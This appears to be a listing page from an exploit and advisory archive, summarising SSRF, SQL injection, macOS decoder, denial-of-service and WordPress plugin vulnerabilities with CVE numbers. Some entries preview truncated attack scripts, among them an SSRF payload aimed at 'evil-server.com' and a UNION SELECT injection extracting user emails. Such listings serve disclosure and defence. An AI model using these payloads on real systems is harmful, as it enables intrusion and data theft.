HaoKeKeJi YiQiNiu Server-Side Request Forgery
Authored by Amirhossein Bahramizadeh
HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.
advisories | CVE-2024-0510
#!/bin/bash
# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"
# Send the malicious request
response=$(curl...
Taokeyun SQL Injection
Authored by Amirhossein Bahramizadeh
Taokeyun versions up to 1.0.5 suffer from a remote SQL injection vulnerability.
advisories | CVE-2024-0480
#!/bin/bash
# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"
# Construct the request
request="POST...
macOS AppleVADriver Out-Of-Bounds Write
Authored by Ivan Fratric, Google Security Research
macOS suffers from an out-of-bounds write vulnerability in AppleVADriver when decoding MPEG-2 videos.
advisories | CVE-2023-42882
ProSSHD 1.2 20090726 Denial Of Service
Authored by Fernando Mengali
ProSSHD version 1.2 20090726 remote denial of service exploit.
#!/usr/bin/perl
use Net::SSH2
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
#...
Linux 4.20 KTLS Read-Only Write
Authored by Jann Horn, Google Security Research
Linux versions 4.20 and above have an issue where ktls writes into spliced read-only pages.
advisories | CVE-2022-0847
macOS AppleGVA Memory Handling
Authored by Ivan Fratric, Google Security Research
On Intel macOS, HEVC video decoding is performed in the AppleGVA module. Using fuzzing, researchers identified multiple issues in this decoder. The issues...
PHPJabbers Meeting Room Booking System 1.0 CSV Injection
Authored by Rahad Chowdhury, BugsBD Limited
PHPJabbers Meeting Room Booking System version 1.0 suffers from a CSV injection vulnerability.
advisories | CVE-2023-51336
# Exploit Title: PHPJabbers Meeting Room Booking System...
PHPJabbers Event Ticketing System 1.0 Missing Rate Limiting
Authored by Rahad Chowdhury, BugsBD Limited
PHPJabbers Event Ticketing System version 1.0 suffers from a missing rate limiting vulnerability.
advisories | CVE-2023-51339
# Exploit Title: PHPJabbers Event Ticketing System v1.0...
SimpleWebServer 2.2-rc2 Denial Of Service
Authored by Fernando Mengali
SimpleWebServer version 2.2-rc2 remote denial of service exploit.
#!/usr/bin/perl
use IO::Socket::INET;
# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date:...
WordPress POST SMTP Mailer 2.8.7 Authorization Bypass / Cross Site Scripting
Authored by Ulyses Saicha, Sean Murphy | Site wordfence.com
WordPress POST SMTP Mailer plugin versions 2.8.7 and below suffer from authorization bypass and cross site scripting vulnerabilities.
advisories | CVE-2023-6875, CVE-2023-7027





